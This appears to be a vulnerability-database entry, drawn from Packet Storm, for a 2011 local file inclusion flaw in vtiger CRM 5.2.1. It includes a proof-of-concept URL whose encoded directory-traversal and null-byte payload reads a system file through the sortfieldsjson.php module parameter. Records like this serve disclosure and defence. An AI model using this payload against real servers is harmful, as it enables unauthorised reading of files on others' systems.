ID

VAR-E-201104-0865


TITLE

vtiger CRM 5.2.1 Local File Inclusion

Trust: 0.5

sources: PACKETSTORM: 100182

DESCRIPTION

A local file inclusion vulnerability in vtiger CRM version 5.2.1 can be exploited to include arbitrary files.

Trust: 0.5

sources: PACKETSTORM: 100182

AFFECTED PRODUCTS

vendor:vtigermodel:crmscope:eqversion:5.2.1

Trust: 0.5

sources: PACKETSTORM: 100182

EXPLOIT

------------------------------------------------------------------------
Software................vtiger CRM 5.2.1
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.vtiger.com/
Discovery Date..........4/5/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in vtiger CRM 5.2.1 can be
exploited to include arbitrary files.

--PoC--

http://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

Trust: 0.5

sources: PACKETSTORM: 100182

EXPLOIT HASH

LOCAL

SOURCE

md5: fd14ff11efa9924913a8942a5adc4f97
sha-1: 2c8df0cfbcf77ebe8a922dfdf98df608b30b0621
sha-256: 588c18208d84dab6e005ca0cf9a5d3627abdc7d5c0a944370d71d56b3058647f
md5: fd14ff11efa9924913a8942a5adc4f97

Trust: 0.5

sources: PACKETSTORM: 100182

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 100182

TYPE

arbitrary, file inclusion

Trust: 0.5

sources: PACKETSTORM: 100182

TAGS

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:local

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 100182

CREDITS

AutoSec Tools

Trust: 0.5

sources: PACKETSTORM: 100182

EXTERNAL IDS

db:PACKETSTORMid:100182

Trust: 0.5

sources: PACKETSTORM: 100182

SOURCES

db:PACKETSTORMid:100182

LAST UPDATE DATE

2022-07-27T09:33:12.936000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:100182date:2011-04-07T21:57:15